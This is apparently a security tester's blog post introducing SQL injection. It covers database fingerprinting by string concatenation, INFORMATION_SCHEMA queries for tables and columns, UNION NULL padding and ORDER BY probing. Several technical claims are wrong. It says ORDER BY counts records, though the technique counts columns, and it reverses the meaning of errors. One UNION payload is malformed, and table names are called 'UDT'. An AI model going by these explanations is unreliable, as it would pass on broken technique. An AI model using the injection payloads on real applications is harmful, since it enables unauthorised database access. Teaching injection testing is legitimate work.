Being a Security Tester, I have one of the most teasing and innovative jobs in my profession. We, testers, are asked to identify as many major security vulnerabilities in the application, given limited time and resources. We have the constraint to explore the application in lesser time than the developers who build the application. We have to discover all the vulnerabilities present in the application, while the hacker conveniently has all the time and resources to do that. Well, that’s what makes this job interesting and challenging.
As SQL injection continues to be the dominant technique for data fraud, I would like to dedicate this blog to the topic in an effort to eliminate this problem. Let’s get started on the basics of how to identify an injection.
SQL Injection :
Using SQL injection testing tools like sqlmap, you can identify possible areas where injection can be done. It allows you to check for a wide range of possibilities of how and where a hacker would exploit an application.
How to discover which Database server might be exploited?
This is essential because a security tester requires the knowledge of which database might be exploited. Before getting started, there is a method called ‘guessing’.
If your web site / web application has page extensions like .asp, .aspx etc. then there is a lot of possibilities of using SQL Server/MS Access. If the extension is .jsp, then it could most probably be Oracle. If the extensions are .php, then the database could be MYSQL/PostGreSQL. However, if the guessing goes wrong then the actual work begins. Let’s see how to identify Database as a beginner.
For SQL Server- TESTING and TEST + ING are the same.
But in case of Oracle- TESTING and TEST || ING are the same.
When we give input as TEST || ING and get an error, it means that the database is not oracle. It implies that we can move to the next concatenation syntax of other DBs until we find the right DB.
Next, using system defined functions like date functions, joins, etc., we can narrow down the back end server.
Samples for SQL Injection :
These are the most common attacks we try with, but are not confined to:
- Discover the tables of DB
- Discover columns of table
- Using ‘ORDER By’ syntax to find number of records in the columns
Discover the tables of DB
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
This query can be useful to retrieve UDT in the DB.
Discover columns of table
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Accounts'
This query is helpful to discover the number of columns in a table.
UNION select COLUMN1_NAME,NULL, NULL, NULL, NULL, NULL
can be helpful. – Using ‘Union’ we will be able to identify the number of columns in the table. At least one column name should be provided.
When successful, we need to try a ‘select’ statement from the above result query.
Select * from TABLE_NAME where COLUMN_NAME = 'TESTING'
Numerous attempts(Guessing) shall be required to find a column name.
Once you find a COLUMN_NAME, the below query could be helpful to find the number of columns that exist:
select * from TABLE_NAME where COLUMN_NAME = 'TESTING' union Select * from TABLE_NAME where COLUMN_NAME, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES --'
*\\Single quote exploitation is used. The above query can confirm the number of columns.
Using ‘ORDER By’ syntax to find number of records in the columns
With the result of above query, using ‘ORDER BY’ syntax will show the number of columns.
select * from TABLE_NAME where COLUMN_NAME = “” Order by 1
If this query throws an error then it is understood that records exist.
select * from TABLE_NAME where COLUMN_NAME = “” Order by 200
If this query throws an error then it implies that less than 200 records exists.
select * from TABLE_NAME where COLUMN_NAME = “” Order by 100
This query might not show error and help to identify the range of records present in the table.
There are advanced levels of injection like User level login etc., which I would write about in my forth coming blogs. Stay with us for all that and more on other security testing techniques.